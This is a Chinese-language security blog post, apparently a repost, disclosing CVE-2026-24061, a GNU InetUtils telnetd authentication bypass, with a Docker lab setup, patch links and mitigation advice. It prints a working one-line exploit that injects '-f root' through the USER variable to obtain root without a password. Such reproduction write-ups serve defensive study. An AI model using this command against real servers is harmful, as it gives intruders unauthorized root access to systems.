2026-01-26 02:40:34 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文披露GNUInetUtilstelnetd存在远程认证绕过漏洞CVE-2026-24061，通过USER环境变量注入可获取root权限。文章提供Docker复现步骤及利用命令，影响1.9.3至2.7版本。建议及时更新官方补丁，关闭非必要端口，加强权限管理。 综合评分： 90 文章分类： 漏洞POC,漏洞分析,漏洞预警

cover_image

[复现环境] CVE-2026-24061 telnet远程认证绕过漏洞

原创

BeretSec BeretSec

贝雷帽SEC

2026年1月23日 11:29 广东

免责声明

本公众号所提供的文字和信息仅供学习和研究使用，请读者自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。

漏洞简述

GNU InetUtils telnet 守护进程 ( telnetd )中存在一个严重的安全漏洞，该漏洞在近 11 年后仍未被发现。telnetd 服务的远程认证绕过漏洞（CVE-2026-24061）。由于程序在调用 /usr/bin/login 时未对 USER 环境变量进行有效过滤，攻击者可通过注入特殊命令行参数（如 -f root）绕过密码校验，直接获取系统的 root 权限。

漏洞影响

1.9.3 <= GNU InetUtils <= 2.7可通过如下命令确认当前 telnet 所属包和版本dpkg -S /usr/sbin/telnetd && telnetd --version

漏洞复现

ubuntu24 安装telnetd服务[email protected]:~&nbsp;sudo&nbsp;apt-get install inetutils-telnetd [email protected]:~&nbsp;sudo&nbsp;sed -i&nbsp;'s/#<off># telnet/telnet/'&nbsp;/etc/inetd.conf&nbsp;[email protected]:~&nbsp;sudo&nbsp;/etc/init.d/inetutils-inetd start

下面通过dockerfile直接构建复现环境，有需要的朋友可自行构建镜像，运行容器复现

FROM&nbsp;ubuntu:24.04
ENV&nbsp;DEBIAN_FRONTEND=noninteractive
RUN&nbsp;apt-get update &&&nbsp;\&nbsp; &nbsp; apt-get install -y&nbsp;\&nbsp; &nbsp; &nbsp; &nbsp; openbsd-inetd&nbsp;\&nbsp; &nbsp; &nbsp; &nbsp; inetutils-telnetd&nbsp;\&nbsp; &nbsp; &nbsp; &nbsp; telnet&nbsp;\&nbsp; &nbsp; &nbsp; &nbsp; passwd &&&nbsp;\&nbsp; &nbsp; apt-get clean
# 启用 telnetRUN&nbsp;sed -i 's/^#<off># telnet/telnet/' /etc/inetd.conf
# 设置 root 密码RUN&nbsp;echo&nbsp;"root:root123"&nbsp;| chpasswd
EXPOSE&nbsp;23
# openbsd-inetd 的正确路径CMD&nbsp;["/usr/sbin/inetd", "-d"]

构建镜像

docker&nbsp;build -t ubuntu24-telnetd .

运行容器&连接telnet

docker&nbsp;run -d --name telnetd-test -p&nbsp;2323:23&nbsp;ubuntu24-telnetdtelnet&nbsp;<宿主IP>&nbsp;2323

漏洞复现

&nbsp;USER='-f root'&nbsp;telnet -a&nbsp;127.0.0.1&nbsp;2323

【措施建议】

官方已发布新版本修复漏洞，请访问链接下载：

htt ps://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=fd702c0htt ps://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=ccba9f7

【临时措施】

1、定期更新系统补丁，减少系统漏洞，提升服务器的安全性。

2、加强系统和网络的访问控制，修改防火墙策略，关闭非必要的应用端口或服务，减少将危险服务（如SSH、RDP等）暴露到公网，减少攻击面。

3、加强系统用户和权限管理，启用多因素认证机制和最小权限原则，用户和软件权限应保持在最低限度。

End

“点赞、在看与分享都是莫大的支持”

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：贝雷帽SEC BeretSec BeretSec《[复现环境] CVE-2026-24061 telnet远程认证绕过漏洞》